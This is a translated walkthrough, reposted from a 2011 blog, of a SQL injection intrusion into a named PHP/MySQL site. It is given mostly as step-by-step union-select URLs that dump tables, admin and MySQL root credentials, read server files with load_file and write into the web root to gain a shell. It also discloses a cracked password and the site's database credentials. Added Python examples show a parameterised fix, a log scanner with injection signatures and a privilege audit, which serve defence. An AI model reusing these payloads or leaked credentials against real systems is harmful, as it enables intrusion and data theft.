Reposted from: http://hi.baidu.com/micropoor

//Special edition ------- hands-on case

//2011-11-17, Thursday
//Environment: win+php+mysql

http://www.Micropoor.com/answer_view.php?id=10291
http://www.Micropoor.com/answer_view.php?id=10291' //Injectable. See figure:
//The usual route: dump the tables. Nearly every MySQL these days is a recent version, so I generally don't bother guessing the version.
http://www.Micropoor.com/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--   See figure:

482
//Switch to Firefox and dump the tables. See figure
http://www.Micropoor.com/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database()
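Added example, not code from the original post: the handler pattern behind `answer_view.php` is reconstructed here in Python over an in-memory SQLite database. The table names `answer` and `admuser` come from the post; the column layout, row contents and hash value are constructed. The vulnerable version concatenates the `id` parameter into the SQL text, so the `and 1=2 union select` pattern from the requests above pulls rows out of another table; the hardened version enforces the integer type and binds the value as a parameter, so the same input is rejected before any SQL runs.

```python
import sqlite3


# Constructed fixture: the table names appear in the post, everything else
# (columns, rows, the placeholder hash) is made up for this example.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE answer (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE admuser (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO answer VALUES (10291, 'Question 10291', 'answer text')")
    conn.execute("INSERT INTO admuser VALUES (1, 'chen', 'constructed-hash')")
    return conn


# Vulnerable: the raw request parameter becomes part of the SQL statement,
# so a value containing " and 1=2 union select ..." rewrites the query.
def answer_view_vulnerable(conn, id_param: str):
    sql = "SELECT id, title, body FROM answer WHERE id=" + id_param
    return conn.execute(sql).fetchall()


# Hardened: enforce the expected type first, then bind the value. The SQL
# text is constant, so the driver never interprets the input as syntax.
def answer_view_hardened(conn, id_param: str):
    try:
        id_value = int(id_param)   # "10291'" or "10291 and ..." raise ValueError
    except ValueError:
        return None                # reject (and log) malformed input
    return conn.execute(
        "SELECT id, title, body FROM answer WHERE id=?", (id_value,)
    ).fetchall()


# Same shape as the post's payload; the column count (3) matches the
# constructed table, whereas the post's target needed 21 columns.
INJECTED = "10291 and 1=2 union select 1,username,3 from admuser"

if __name__ == "__main__":
    db = build_db()
    print(answer_view_vulnerable(db, "10291"))
    print(answer_view_vulnerable(db, INJECTED))  # leaks the admuser row
    print(answer_view_hardened(db, INJECTED))    # None: rejected
```

The type check alone would already stop the numeric `id` case; the parameter binding is what keeps string parameters (such as a username) safe as well, which is why the hardened handler does both.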



//Table structure:

admuser,admuser2,adn_anuncios,adn_foros,adn_foros_nuevos,adn_malas_palabras,adn_mensajes,adn_mensajes_nuevos,adn_paginas,adn_usuarios,answer,attach,book,case_history,classes,classes2,click,docs,export,getwell,lyb,lyb2,member,news,pinglun,proclasses,production,soft,vote,vote_save,zhidao
The columns are probably user, username or something along those lines. Dump them anyway.
http://www.Micropoor.com/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns%20where%20table_name=0x61646D75736572
//See figure

/*
id,username,password,id,username,password
*/
All that's left is the query. 248
http://www.Micropoor.com/answer_view.php?id=10291%20and%201=2%20union%20select%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admuser
//See figure:

User:       chen

Password: 2a0e926d20b06f13601c729602a9f24e

Cracked:    chen2011
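Added example, not part of the original post: a small access-log scanner written for this walkthrough that looks for the request patterns used above (the trailing-quote probe, `union select`, `information_schema`, `group_concat`, `load_file`, `into dumpfile`, `@@` variables, `mysql.user`) after percent-decoding the request target. The log lines are constructed in combined log format from the post's own URLs; the signature names, the bounded decode-until-stable loop and the finding structure are this example's choices. The `mysql.user` pattern deliberately has no leading word boundary so that the whitespace-free variant that appears later in the post still matches.

```python
import re
from urllib.parse import unquote_plus

# Signature names and patterns are this example's own; they cover the
# techniques visible in the post. Applied to the decoded, lower-cased target.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    # no leading \b: "fromMySQL.user" (no spaces at all) must still hit
    ("mysql_user_table", re.compile(r"mysql\.user\b")),
    ("load_file", re.compile(r"\bload_file\s*\(")),
    ("file_write", re.compile(r"\binto\s+(?:dump|out)file\b")),
    ("server_variable", re.compile(r"@@\w+")),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(")),
    # a bare quote inside a parameter value is a weak signal on its own
    # (names like O'Brien), but it is the first probe in the post
    ("quote_in_parameter", re.compile(r"=[^&]*'")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen too."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"\s+", " ", target.lower())


def scan_access_log(lines):
    """Return one finding per log line that matches at least one signature."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = decode_target(m.group(1))
        hits = [name for name, rx in SIGNATURES if rx.search(target)]
        if hits:
            findings.append({"line": lineno, "target": target, "hits": hits})
    return findings


# Constructed sample log (combined format), built from the URLs in the post;
# the first line is a benign request and must not be flagged.
LOG_LINES = [
    '10.0.0.5 - - [17/Nov/2011:10:01:02 +0800] "GET /answer_view.php?id=10291 HTTP/1.1" 200 4821',
    '10.0.0.5 - - [17/Nov/2011:10:01:09 +0800] "GET /answer_view.php?id=10291\' HTTP/1.1" 500 312',
    '10.0.0.5 - - [17/Nov/2011:10:02:40 +0800] "GET /answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 5102',
    '10.0.0.5 - - [17/Nov/2011:10:15:03 +0800] "GET /pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,load_file(0x633a5c),0x5e5e5e))),0%20-- HTTP/1.1" 200 9801',
    '10.0.0.5 - - [17/Nov/2011:10:20:11 +0800] "GET /pinglun.php?id=7387and(selectcount(*)fromMySQL.user)>0-- HTTP/1.1" 200 5102',
    '10.0.0.5 - - [17/Nov/2011:10:21:11 +0800] "GET /pinglun.php?id=7387%20and%201=2%20union%20select%200,concat(char(116)),0%20into%20dumpfile%20\'d:%5C%5Cweb%5C%5C1.txt\'-- HTTP/1.1" 200 5102',
]

if __name__ == "__main__":
    for f in scan_access_log(LOG_LINES):
        print(f["line"], f["hits"])
```

In practice the scanner would be fed the web server's log stream and the `quote_in_parameter` hit alone would be kept at low severity; the later signatures (especially `load_file` and `file_write`) are the ones worth alerting on immediately.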
 
//Now a problem: the admin backend can't be found. See figure:

http://www.Micropoor.com/manage/  //Later learned this one is fake

/*Stalemate.
The account and password are out, but the backend can't be found. Thinking over the details: I never checked which user, what privileges, or the database version.
*/
http://www.Micropoor.com/answer_view.php?id=10291%20and%202=4%20union%20select%201,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
//See figure:

root!
Check whether writing is possible:
http://www.Micropoor.com/answer_view.php?id=10291and(selectcount(*)fromMySQL.user)>0--
//See figure:

//Echo is normal; what remains is knowing the path. Check the database path first.
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex%28hex%28concat%280x5e5e5e,@@basedir,0x5e5e5e%29%29%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--
//Not usable. See figure

Which brings to mind that the direct dump from earlier can be done the advanced way:
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(table_schema,0x3a,table_name),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20information_schema.tables%20order%20by%20table_schema%20limit%200,50)%20t%20%20--
//See figure:

//Keep dumping
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(user,0x3a,password),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20mysql.user%20order%20by%20user%20limit%200,50)%20t%20%20--
//See figure

root's hash came out. Unfortunately, it couldn't be cracked.
So it's time to think of the load_file function.
//Reference: PHP Security News 8 AM (2011-11-13, Sunday)
//http://hi.baidu.com/micropoor/blog/item/953acb6d896a6c7d0c33fac9.html
Since load_file is needed, first check whether magic_quotes_gpc is off or on.
//See figure:

No error, so it's off.
Since it's a Windows system, it's either Apache or IIS. Judging from the response it's IIS, so read the configuration file.
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,load_file(0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--
Note the Concat function!
//Reference: PHP Security News, exploiting the Concat function
//See figure:

/*Returned correctly, meaning the read succeeded. Look at the source!
Path: D:\web\Micropoor
Start writing!
*/
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,concat(char(116),char(101),char(115),char(116),char(13),char(10)),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20into%20dumpfile%20'd:%5C%5Cweb%5C%5CMicropoor%5C%5C1.txt'--
//See figure:

/*
Write succeeded; get a shell and escalate privileges.
D:/web/Micropoor/conn.php configuration file
*/
$Host="localhost";  
$Database="Micropoor";  
$DbaUser     ="root";  
$DbaPassword="Micropoor";  
//See figure:
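Added example, not part of the original post: a deployment audit written for this walkthrough. It parses the kind of output `SHOW VARIABLES` and `SHOW GRANTS` produce (all of it constructed here), reads the `$DbaUser` setting from a `conn.php`-style snippet (the password value is a placeholder), and flags the conditions that let the chain above go as far as it did: the application connecting as root, an unrestricted `secure_file_priv` (the server setting that governs `LOAD_FILE` and `INTO DUMPFILE`), `ALL PRIVILEGES` or `FILE` grants, and accounts reachable from any host. The finding codes and the two input sets are this example's own.

```python
import re

GRANT_RE = re.compile(r"GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\s+'([^']+)'@'([^']+)'", re.IGNORECASE)
PHP_USER_RE = re.compile(r'\$DbaUser\s*=\s*"([^"]*)"')  # variable name from the post's conn.php


def parse_show_variables(text: str) -> dict:
    """Parse tab-separated 'Variable_name<TAB>Value' rows (mysql batch-mode output)."""
    variables = {}
    for line in text.strip().splitlines():
        name, _, value = line.partition("\t")
        variables[name.strip()] = value.strip()
    return variables


def php_db_user(conn_php: str):
    """Pull the account name out of a conn.php-style snippet, or None if absent."""
    m = PHP_USER_RE.search(conn_php)
    return m.group(1) if m else None


def audit_mysql_deployment(variables: dict, grants, app_user) -> list:
    """Return finding codes (names are this example's own) in a fixed order."""
    findings = []
    if app_user == "root":
        findings.append("app_user_is_root")
    # Empty string: LOAD_FILE / INTO DUMPFILE may touch any path the server
    # process can reach. NULL disables them; a directory confines them to it.
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv_unrestricted")
    if variables.get("local_infile", "OFF").upper() == "ON":
        findings.append("local_infile_enabled")
    for grant in grants:
        m = GRANT_RE.match(grant)
        if not m:
            continue
        privileges, _scope, _user, host = m.groups()
        privileges = privileges.upper()
        if "ALL PRIVILEGES" in privileges or privileges == "ALL":
            findings.append("grant_all_privileges")      # implies FILE as well
        elif re.search(r"\bFILE\b", privileges):
            findings.append("grant_file_privilege")
        if host == "%":
            findings.append("grant_wildcard_host")
    return findings


# Constructed inputs: the weak set mirrors the situation in the post, the
# hardened set is what a least-privilege deployment of the same app looks like.
WEAK_VARIABLES = "secure_file_priv\t\nlocal_infile\tON"
WEAK_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION",
    "GRANT FILE ON *.* TO 'report'@'localhost'",
]
WEAK_CONN_PHP = '$Host="localhost";\n$Database="Micropoor";\n$DbaUser     ="root";\n$DbaPassword="<placeholder>";'

HARDENED_VARIABLES = "secure_file_priv\tNULL\nlocal_infile\tOFF"
HARDENED_GRANTS = ["GRANT SELECT, INSERT, UPDATE, DELETE ON `Micropoor`.* TO 'webapp'@'localhost'"]
HARDENED_CONN_PHP = '$Host="localhost";\n$Database="Micropoor";\n$DbaUser="webapp";\n$DbaPassword="<placeholder>";'


def run_audit(variables_text: str, grants, conn_php: str) -> list:
    return audit_mysql_deployment(parse_show_variables(variables_text), grants, php_db_user(conn_php))


if __name__ == "__main__":
    print(run_audit(WEAK_VARIABLES, WEAK_GRANTS, WEAK_CONN_PHP))
    print(run_audit(HARDENED_VARIABLES, HARDENED_GRANTS, HARDENED_CONN_PHP))  # []
```

With the hardened settings, the injection in `answer_view.php` would still need fixing, but the same bug could no longer read `MetaBase.xml`, write into the web root, or dump `mysql.user`, because the web account has neither `FILE` nor global privileges and `secure_file_priv` is NULL.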

Conclusion: security usually starts with the basics.